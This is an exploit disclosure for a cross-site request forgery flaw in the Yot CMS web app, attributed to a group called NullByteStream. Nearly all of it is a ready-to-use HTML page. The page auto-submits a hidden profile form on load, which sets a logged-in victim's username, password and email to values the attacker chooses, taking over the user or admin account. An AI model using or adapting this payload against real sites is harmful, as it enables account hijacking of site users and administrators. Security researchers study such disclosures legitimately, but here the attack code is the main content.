# Product : Yot CMS webapp
# Author : ÃŕMąŃđÒ - NullByteStream Team
# vendor homepage : https://sourceforge.net/projects/yot/
# Date : 10/2/2019
# Dork : N/A
##############################################################
This CSRF vulnerability allows attacker to change user/admin account details ( username , password .... )
Exploit :
<html>
<body onload='document.forms[0].submit()'>
<form action="http://site.com/index.php?page=user&op=do_profil" method="POST" name="user_form" enctype="multipart/form-data" OnSubmit='return user_form_verifchamps();'>
<table name="user_form" class="tabform" cellpadding="1" align="center" ><tr><td valign="top"><label>Pseudo</label> :</td><td valign="top"><input type="text" name="user" value="newusername" size="30" /> * </td></tr><tr><td valign="top"><label>Pr�nom</label> :</td><td valign="top"><input type="text" name="firstname" value="armando" size="30" /></td></tr><tr><td valign="top"><label>Nom</label> :</td><td valign="top"><input type="text" name="name" value="syria" size="30" /></td></tr><tr><td valign="top"><label>Mot de passe</label> :</td><td valign="top"><input type="password" name="pass1" value="newpassword" size="30" /></td></tr><tr><td valign="top"><label>Retaper mot de passe</label> :</td><td valign="top"><input type="password" name="pass2" value="newpassword" size="30" /></td></tr><tr><td valign="top"><label>Email</label> :</td><td valign="top"><input type="text" name="mail" value="MyEmail@server.com" size="30" /> * </td></tr><tr><td valign="top"><label>URL Avatar</label> :</td><td valign="top"><input type="text" name="avatar" value="" size="30" /></td></tr><tr><td valign="top"><label>T�l�charger un avatar</label> :</td><td valign="top"><input type="file" name="upload_avatar" /></td></tr><tr><td valign="top"><label>Th�me</label> :</td><td valign="top"><select name="theme"><option value="" selected></option><option value="coolbad" >coolbad</option><option value="coolbad_jaune" >coolbad_jaune</option><option value="yot3" >yot3</option></select></td></tr><tr><td valign="top"><label>Pr�venir par email d'une nouvelle news</label> :</td><td valign="top"><input type="radio" name="mailnews" value="1" />Oui <input type="radio" name="mailnews" value="0" checked />Non </td></tr></table>
<div align="center">(*) Champs obligatoires<br/><br/><input type="submit" value="Modifier"/></div>
</form>
###############################################################
NBS Team
http;//nullbytestream.tk
###############################################################